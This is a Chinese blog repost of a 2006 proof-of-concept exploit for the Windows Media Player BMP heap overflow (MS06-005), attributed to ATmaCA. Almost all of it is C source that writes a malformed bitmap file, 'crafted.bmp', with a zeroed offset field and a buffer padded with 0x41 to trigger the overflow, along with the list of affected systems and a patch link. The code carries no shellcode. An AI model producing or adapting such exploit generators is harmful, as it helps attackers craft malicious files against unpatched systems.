〾堯仸〾的天空--Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)

Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)
文章收藏

〾堯仸〾发表于 2006/2/16 16:18:58

转载自: http://www.frsirt.com/exploits/20060215.wmp-ms06-005.cpp.php Microsoft Windows Media Player BMP Handling Buffer Overflow Exploit (MS06-005)Date : 15/02/2006 Advisory ID : FrSIRT/ADV-2006-0574 Rated as : Critical 500)this.width=500'> Note : Proof of concept /* * * Windows Media Player BMP Heap Overflow (MS06-005) * Bug discovered by eEye - http://www.eeye.com/html/research/advisories/AD20060214.html * Exploit coded by ATmaCA * Web: http://www.spyinstructors.com && http://www.atmacasoft.com * E-Mail: atmaca@icqmail.com * Credit to Kozan * * wmp_remote_poc.asx : * * * * * * * * * */ /* * * Systems Affected: * Microsoft Windows Media Player 7.1 through 10 * * Windows NT 4.0 * Windows 98 / ME * Windows 2000 SP4 * Windows XP SP1 / SP2 * Windows 2003 * * */ /* * * In this vulnerability,payload is loaded to different places in memory each time. * but some time is very easy to call our shell code : * http://www.spyinstructors.com/atmaca/research/wmp.JPG * but some times not =) because of ,no shell this time * */ /* * * Microsoft has released a patch for this vulnerability. * The patch is available at: * http://www.microsoft.com/technet/security/bulletin/ms06-005.mspx * */ #include #include #define BITMAP_FILE_SIZE 0xA8D2 #define BITMAP_FILE_NAME "crafted.bmp" #pragma pack( push ) #pragma pack( 1 ) // bitmap file format - http://atlc.sourceforge.net/bmp.html //File information header provides general information about the file typedef struct _BitmapFileHeader { WORD bfType; DWORD bfSize; WORD bfReserved1; WORD bfReserved2; DWORD bfOffBits; } BMPFHEADER; //Bitmap information header provides information specific to the image data typedef struct _BitmapInfoHeader{ DWORD biSize; LONG biWidth; LONG biHeight; WORD biPlanes; WORD biBitCount; DWORD biCompression; DWORD biSizeImage; LONG biXPelsPerMeter; LONG biYPelsPerMeter; DWORD biClrUsed; DWORD biClrImportant; } BMPIHEADER; #pragma pack( pop ) int main(void) { FILE *File; BMPFHEADER *bmp_fheader; BMPIHEADER *bmp_iheader; char *pszBuffer; printf("\nWindows Media Player BMP Heap Overflow (MS06-005)"); printf("\nBug discovered by eEye"); printf("\nExploit coded by ATmaCA"); printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com"); printf("\nE-Mail: atmaca@icqmail.com"); printf("\nCredit to Kozan"); if ( (File = fopen(BITMAP_FILE_NAME,"w+b")) == NULL ) { printf("\n [E:] fopen()"); exit(1); } bmp_fheader=(BMPFHEADER*)malloc(sizeof(BMPFHEADER)); bmp_iheader=(BMPIHEADER*)malloc(sizeof(BMPIHEADER)); pszBuffer = (char*)malloc(BITMAP_FILE_SIZE); memset(pszBuffer,0x41,BITMAP_FILE_SIZE); bmp_fheader->bfType = 0x4D42; // "BM" bmp_fheader->bfSize = BITMAP_FILE_SIZE; bmp_fheader->bfReserved1 = 0x00; bmp_fheader->bfReserved2 = 0x00; // eEye - MAGIC // Antiviruses will get the signature from here!!! bmp_fheader->bfOffBits = 0x00; //( sizeof(BMPFHEADER) + sizeof(BMPIHEADER) ); bmp_iheader->biSize = 0x28; bmp_iheader->biWidth = 0x91; bmp_iheader->biHeight = 0x63; bmp_iheader->biPlanes = 0x01; bmp_iheader->biBitCount = 0x18; bmp_iheader->biCompression = 0x00; bmp_iheader->biSizeImage = 0xA89C; bmp_iheader->biXPelsPerMeter = 0x00; bmp_iheader->biYPelsPerMeter = 0x00; bmp_iheader->biClrUsed = 0x00; bmp_iheader->biClrImportant = 0x00; memcpy(pszBuffer,bmp_fheader,sizeof(BMPFHEADER)); memcpy(pszBuffer+sizeof(BMPFHEADER),bmp_iheader,sizeof(BMPIHEADER)); fwrite(pszBuffer, BITMAP_FILE_SIZE-1, 1,File); fwrite("\x00", 1,1, File); //Terminator fclose(File); printf("\n\n" BITMAP_FILE_NAME" has been created in the current directory.\n"); return 1; }

阅读全文(2484) | 回复(0) | 编辑 | 精华

发表评论：

昵称：
密码：
主页：
标题：

验证码： (不区分大小写,请仔细填写,输错需重写评论内容！)